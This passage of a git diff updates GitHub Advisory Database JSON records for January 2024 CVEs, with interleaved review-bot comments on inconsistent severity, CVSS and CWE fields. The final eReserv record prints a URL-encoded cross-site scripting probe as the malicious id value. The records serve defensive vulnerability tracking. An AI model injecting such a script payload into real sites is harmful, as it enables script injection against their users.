+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1017"
+ },
+ {
+ "type": "WEB",
+ "url": "https://packetstormsecurity.com/files/176714/Gabriels-FTP-Server-1.2-Denial-Of-Service.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252287"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252287"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.youtube.com/watch?v=wwHuXfYS8yQ"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T19:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json b/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json
index 1de61f25eaca5..0addd5d75f592 100644
--- a/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json
+++ b/advisories/unreviewed/2024/01/GHSA-ff22-5jp8-224r/GHSA-ff22-5jp8-224r.json
@@ -56,6 +56,46 @@
 {
 "type": "WEB",
 "url": "https://www.openeuler.org/zh/security/security-bulletins/detail/?id=openEuler-SA-2024-1035"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/10"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/3"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/4"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/5"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/30/9"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/31/2"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/31/3"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/02/6"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/02/9"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/02/03/1"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json b/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json
index 5c86a681ddd6f..0a306319f630a 100644
--- a/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json
+++ b/advisories/unreviewed/2024/01/GHSA-fg7j-3vp4-4qpg/GHSA-fg7j-3vp4-4qpg.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fg7j-3vp4-4qpg",
- "modified": "2024-01-24T03:31:25Z",
+ "modified": "2024-01-31T00:30:17Z",
 "published": "2024-01-24T03:31:25Z",
 "aliases": [
 "CVE-2024-22380"
 ],
 "details": "Electronic Delivery Check System (Ministry of Agriculture, Forestry and Fisheries The Agriculture and Rural Development Project Version) March, Heisei 31 era edition Ver.14.0.001.002 and earlier improperly restricts XML external entity references (XXE). By processing a specially crafted XML file, arbitrary files on the system may be read by an attacker.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 
@@ -29,9 +32,9 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-611"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T02:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-fgff-579x-65fj/GHSA-fgff-579x-65fj.json b/advisories/unreviewed/2024/01/GHSA-fgff-579x-65fj/GHSA-fgff-579x-65fj.json
new file mode 100644
index 0000000000000..df24d9dec17cf
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-fgff-579x-65fj/GHSA-fgff-579x-65fj.json
@@ -0,0 +1,35 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fgff-579x-65fj",
+ "modified": "2024-01-31T09:30:18Z",
+ "published": "2024-01-31T09:30:18Z",
+ "aliases": [
+ "CVE-2024-23775"
+ ],
+ "details": "Integer Overflow vulnerability in Mbed TLS 2.x before 2.28.7 and 3.x before 3.5.2, allows attackers to cause a denial of service (DoS) via mbedtls_x509_set_extension().",
+ "severity": [
+
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23775"
+ },
+ {
+ "type": "WEB",
+ "url": "https://mbed-tls.readthedocs.io/en/latest/security-advisories/mbedtls-security-advisory-2024-01-2/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+
+ ],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T08:15:42Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-fgx5-x337-5fv2/GHSA-fgx5-x337-5fv2.json b/advisories/unreviewed/2024/01/GHSA-fgx5-x337-5fv2/GHSA-fgx5-x337-5fv2.json
new file mode 100644
index 0000000000000..f9558a7920d67
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-fgx5-x337-5fv2/GHSA-fgx5-x337-5fv2.json
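Review bot: The new GHSA-fgff-579x-65fj record ships with `"severity": [` empty, `"cwe_ids": [` empty and `"severity": null`, so consumers that filter by rating or weakness class will not surface a TLS-library denial-of-service at all, even though `details` names the mechanism ("Integer Overflow ... via mbedtls_x509_set_extension()") and the vendor advisory is linked. The other hunks in this commit (for example GHSA-c978-j9mm-m34q) show the expected follow-up shape — a `CVSS_V3` object in `severity` and a CWE string in `cwe_ids`; presumably CWE-190 is the matching class here, to be confirmed against the linked Mbed TLS advisory once the NVD analysis lands rather than inferred from the description. Until then the empty arrays should be treated as "unscored", not "informational".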
@@ -0,0 +1,46 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fgx5-x337-5fv2",
+ "modified": "2024-01-30T15:30:22Z",
+ "published": "2024-01-30T15:30:22Z",
+ "aliases": [
+ "CVE-2024-1034"
+ ],
+ "details": "A vulnerability, which was classified as critical, was found in openBI up to 1.0.8. This affects the function uploadFile of the file /application/index/controller/File.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252309 was assigned to this vulnerability.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1034"
+ },
+ {
+ "type": "WEB",
+ "url": "https://note.zhaoj.in/share/ABYkFE4wRPW5"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.252309"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.252309"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-434"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T15:15:08Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json b/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json
index 1fa9788ac567a..6d84bfa2b2927 100644
--- a/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json
+++ b/advisories/unreviewed/2024/01/GHSA-fh6j-mgh8-7prh/GHSA-fh6j-mgh8-7prh.json
@@ -36,7 +36,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-400"
+ "CWE-400",
+ "CWE-787"
 ],
 "severity": "HIGH",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-fhq6-2w37-vh8q/GHSA-fhq6-2w37-vh8q.json b/advisories/unreviewed/2024/01/GHSA-fhq6-2w37-vh8q/GHSA-fhq6-2w37-vh8q.json
new file mode 100644
index 0000000000000..afd6742c74a63
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-fhq6-2w37-vh8q/GHSA-fhq6-2w37-vh8q.json
@@ -0,0 +1,50 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fhq6-2w37-vh8q",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-01-31T00:30:18Z",
+ "aliases": [
+ "CVE-2024-1060"
+ ],
+ "details": "Use after free in Canvas in Google Chrome prior to 121.0.6167.139 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1060"
+ },
+ {
+ "type": "WEB",
+ "url": "https://chromereleases.googleblog.com/2024/01/stable-channel-update-for-desktop_30.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://crbug.com/1511567"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NEUXJY3YC3VGIJW2AOHL4NZ7ZK7BRYWY/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XCVKRHRWPMITSVFBHQBSNXOVJAKT547Q/"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T22:15:53Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-fjv8-rf2g-h37h/GHSA-fjv8-rf2g-h37h.json b/advisories/unreviewed/2024/01/GHSA-fjv8-rf2g-h37h/GHSA-fjv8-rf2g-h37h.json
new file mode 100644
index 0000000000000..7c5e900e3b51f
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-fjv8-rf2g-h37h/GHSA-fjv8-rf2g-h37h.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fjv8-rf2g-h37h",
+ "modified": "2024-02-05T21:30:31Z",
+ "published": "2024-01-31T09:30:18Z",
+ "aliases": [
+ "CVE-2024-0836"
+ ],
+ "details": "The WordPress Review & Structure Data Schema Plugin – Review Schema plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the rtrs_review_edit() function in all versions up to, and including, 2.1.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify arbitrary reviews.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0836"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3028627/review-schema/trunk/app/Controllers/Ajax/Review.php"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b7039206-a25a-4aa0-87e2-be11dd1f12eb?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T08:15:41Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-fp4h-ppqj-prv5/GHSA-fp4h-ppqj-prv5.json b/advisories/unreviewed/2024/01/GHSA-fp4h-ppqj-prv5/GHSA-fp4h-ppqj-prv5.json
new file mode 100644
index 0000000000000..90df1f76dbdab
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-fp4h-ppqj-prv5/GHSA-fp4h-ppqj-prv5.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fp4h-ppqj-prv5",
+ "modified": "2024-01-29T15:30:29Z",
+ "published": "2024-01-29T15:30:29Z",
+ "aliases": [
+ "CVE-2024-1014"
+ ],
+ "details": "Uncontrolled resource consumption vulnerability in SE-elektronic GmbH E-DDC3.3 affecting versions 03.07.03 and higher. An attacker could interrupt the availability of the administration panel by sending multiple ICMP packets.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1014"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.hackplayers.com/2024/01/cve-2024-1014-and-cve-2024-1015.html"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.incibe.es/en/incibe-cert/notices/aviso-sci/multiple-vulnerabilities-se-elektronic-gmbh-products"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-400"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-29T14:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json b/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json
index 9ba4921374c01..3aab65d4b042e 100644
--- a/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json
+++ b/advisories/unreviewed/2024/01/GHSA-fppg-744g-mv5h/GHSA-fppg-744g-mv5h.json
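Review bot: The CVSS vector in the new GHSA-fp4h-ppqj-prv5 record (`"score": "CVSS:3.1/AV:L/..."`) contradicts its own details text, which describes availability loss caused by sending ICMP packets to the device — a network-reachable condition, not a local one — and the `"severity": "MODERATE"` label is derived from that vector. The vector is presumably mirrored from the upstream source, so the correction belongs there, but until the two agree the record should keep `"github_reviewed": false` rather than be promoted. The details also state an open-ended range ("03.07.03 and higher") with no fixed version, and `"affected": []` is empty, so consumers have nothing machine-readable to match against and no remediation to act on.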
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fppg-744g-mv5h",
- "modified": "2024-01-24T00:30:32Z",
+ "modified": "2024-01-29T15:30:24Z",
 "published": "2024-01-24T00:30:32Z",
 "aliases": [
 "CVE-2024-0812"
 ],
 "details": "Inappropriate implementation in Accessibility in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -39,7 +42,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "HIGH",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-24T00:15:08Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json b/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json
index 7ee1ac6c7838f..406ea4da48dee 100644
--- a/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json
+++ b/advisories/unreviewed/2024/01/GHSA-fpqg-fv5v-vhpr/GHSA-fpqg-fv5v-vhpr.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fpqg-fv5v-vhpr",
- "modified": "2024-01-26T00:30:28Z",
+ "modified": "2024-02-02T18:30:28Z",
 "published": "2024-01-26T00:30:28Z",
 "aliases": [
 "CVE-2024-23055"
 ],
 "details": "An issue in Plone Docker Official Image 5.2.13 (5221) open-source software allows for remote code execution via improper validation of input by the HOST headers.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 
@@ -35,7 +38,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-25T22:15:08Z"
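Review bot: In GHSA-fpqg-fv5v-vhpr the newly added vector `"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"` and the derived `"severity": "MODERATE"` describe a low-impact, user-interaction-dependent issue, while the unchanged details text claims remote code execution via the HOST header; one of the two is wrong, and a consumer triaging by severity will either miss an RCE or over-react to a host-header injection. The second hunk of the same file still leaves `"cwe_ids": []` empty, so the record carries no weakness class that would disambiguate the claim. Either the details wording or the vector needs correcting at the source, and `cwe_ids` should be populated once the weakness class is settled.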
diff --git a/advisories/unreviewed/2024/01/GHSA-fq57-m32w-cmv5/GHSA-fq57-m32w-cmv5.json b/advisories/unreviewed/2024/01/GHSA-fq57-m32w-cmv5/GHSA-fq57-m32w-cmv5.json
new file mode 100644
index 0000000000000..e2d2773b02a4a
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-fq57-m32w-cmv5/GHSA-fq57-m32w-cmv5.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fq57-m32w-cmv5",
+ "modified": "2024-02-06T00:30:25Z",
+ "published": "2024-01-30T03:30:30Z",
+ "aliases": [
+ "CVE-2024-22682"
+ ],
+ "details": "DuckDB <=0.9.2 and DuckDB extension-template <=0.9.2 are vulnerable to malicious extension injection via the custom extension feature.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22682"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/Tu0Laj1/database_test"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T01:16:00Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-frvc-f98w-c5hr/GHSA-frvc-f98w-c5hr.json b/advisories/unreviewed/2024/01/GHSA-frvc-f98w-c5hr/GHSA-frvc-f98w-c5hr.json
new file mode 100644
index 0000000000000..e2eafd2206ee8
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-frvc-f98w-c5hr/GHSA-frvc-f98w-c5hr.json
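Review bot: GHSA-fq57-m32w-cmv5 tags CVE-2024-22682 with `"CWE-89"` (SQL injection), but its details describe loading a malicious extension through the custom extension feature, which is a different weakness class; something like CWE-829 (inclusion of functionality from an untrusted control sphere) looks closer, though that should be confirmed against the reference before changing it. The only non-NVD reference is a personal GitHub repository rather than a vendor advisory, patch or release note, so the `"severity": "CRITICAL"` rating currently rests on an unverified third-party claim and the record should stay unreviewed until a primary source exists. `"affected": []` is also left empty even though the details give a concrete bound (`<=0.9.2` for both DuckDB and the extension template); if the affected package is published on a supported ecosystem, an `ECOSYSTEM` range with `"introduced": "0"` and the first fixed version would make the record actionable for scanners.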
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-frvc-f98w-c5hr",
+ "modified": "2024-02-06T00:30:25Z",
+ "published": "2024-01-31T15:30:20Z",
+ "aliases": [
+ "CVE-2024-22136"
+ ],
+ "details": "Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder.This issue affects Droit Elementor Addons – Widgets, Blocks, Templates Library For Elementor Builder: from n/a through 3.1.5.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22136"
+ },
+ {
+ "type": "WEB",
+ "url": "https://patchstack.com/database/vulnerability/droit-elementor-addons/wordpress-droit-elementor-addons-plugin-3-1-5-cross-site-request-forgery-csrf-vulnerability?_s_id=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-31T14:15:49Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json b/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json
index f1062c27ff516..0d1e72a8c5259 100644
--- a/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json
+++ b/advisories/unreviewed/2024/01/GHSA-fw69-fp6v-v235/GHSA-fw69-fp6v-v235.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fw69-fp6v-v235",
- "modified": "2024-01-25T15:31:53Z",
+ "modified": "2024-01-31T21:31:03Z",
 "published": "2024-01-25T15:31:53Z",
 "aliases": [
 "CVE-2024-0879"
diff --git a/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json b/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json
new file mode 100644
index 0000000000000..32ad8e2e1b0f5
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json
@@ -0,0 +1,38 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g2f8-pfg4-3w3q",
+ "modified": "2024-02-01T06:31:05Z",
+ "published": "2024-01-30T15:30:23Z",
+ "aliases": [
+ "CVE-2024-24331"
+ ],
+ "details": "TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setWiFiScheduleCfg function.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24331"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/13/TOTOlink%20A3300R%20setWiFiScheduleCfg.md"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-78"
+ ],
+ "severity": "CRITICAL",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2024-01-30T15:15:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json b/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json
index eb1171c282400..c46db49a4dd1e 100644
--- a/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json
+++ b/advisories/unreviewed/2024/01/GHSA-g343-63vq-2wq6/GHSA-g343-63vq-2wq6.json
@@ -1,14 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g343-63vq-2wq6",
- "modified": "2024-01-28T03:30:35Z",
+ "modified": "2024-02-01T21:30:30Z",
 "published": "2024-01-28T03:30:35Z",
 "aliases": [
 "CVE-2024-23738"
 ],
 "details": "An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
 ],
 "affected": [
 
@@ -27,7 +30,7 @@
 "cwe_ids": [
 
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2024-01-28T01:15:07Z"
diff --git a/advisories/unreviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json b/advisories/unreviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json
deleted file mode 100644
index 425aca65101cd..0000000000000
--- a/advisories/unreviewed/2024/01/GHSA-g4x3-mfpj-f335/GHSA-g4x3-mfpj-f335.json
+++ /dev/null
@@ -1,35 +0,0 @@
-{
- "schema_version": "1.4.0",
- "id": "GHSA-g4x3-mfpj-f335",
- "modified": "2024-01-22T06:30:32Z",
- "published": "2024-01-22T06:30:32Z",
- "aliases": [
- "CVE-2023-52354"
- ],
- "details": "chasquid before 1.13 allows SMTP smuggling because LF-terminated lines are accepted.",
- "severity": [
-
- ],
- "affected": [
-
- ],
- "references": [
- {
- "type": "ADVISORY",
- "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52354"
- },
- {
- "type": "WEB",
- "url": "https://blitiri.com.ar/p/chasquid/relnotes/#113-2023-12-24"
- }
- ],
- "database_specific": {
- "cwe_ids": [
-
- ],
- "severity": null,
- "github_reviewed": false,
- "github_reviewed_at": null,
- "nvd_published_at": "2024-01-22T06:15:07Z"
- }
-}
\ No newline at end of file
diff --git a/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json b/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json
index 98684dac9e675..5dcb1c8fe761c 100644
--- a/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json
+++ b/advisories/unreviewed/2024/01/GHSA-g5c3-fv5w-x2cw/GHSA-g5c3-fv5w-x2cw.json
@@ -21,6 +21,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20975"
 },
+ {
+ "type": "WEB",
+ "url": "https://security.netapp.com/advisory/ntap-20240201-0007/"
+ },
 {
 "type": "WEB",
 "url": "https://www.oracle.com/security-alerts/cpujan2024.html"
diff --git a/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json b/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json
index c96c8fcc8c50a..af7dce6f41b56 100644
--- a/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json
+++ b/advisories/unreviewed/2024/01/GHSA-g5jr-34r4-rv4w/GHSA-g5jr-34r4-rv4w.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-g5jr-34r4-rv4w",
- "modified": "2024-01-27T03:30:21Z",
+ "modified": "2024-02-01T06:31:04Z",
 "published": "2024-01-27T03:30:21Z",
 "aliases": [
 "CVE-2023-6482"
@@ -28,7 +28,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
-
+ "CWE-321",
+ "CWE-798"
 ],
 "severity": "MODERATE",
 "github_reviewed": false,
diff --git a/advisories/unreviewed/2024/01/GHSA-g6fv-wqqw-hppg/GHSA-g6fv-wqqw-hppg.json b/advisories/unreviewed/2024/01/GHSA-g6fv-wqqw-hppg/GHSA-g6fv-wqqw-hppg.json
new file mode 100644
index 0000000000000..c972312d9f6e0
--- /dev/null
+++ b/advisories/unreviewed/2024/01/GHSA-g6fv-wqqw-hppg/GHSA-g6fv-wqqw-hppg.json
@@ -0,0 +1,42 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-g6fv-wqqw-hppg",
+ "modified": "2024-01-30T03:30:30Z",
+ "published": "2024-01-30T03:30:30Z",
+ "aliases": [
+ "CVE-2024-1026"
+ ],
+ "details": "A vulnerability was found in Cogites eReserv 7.7.58 and classified as problematic. This issue affects some unknown processing of the file front/admin/config.php. The manipulation of the argument id with the input %22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-252293 was assigned to this vulnerability.",
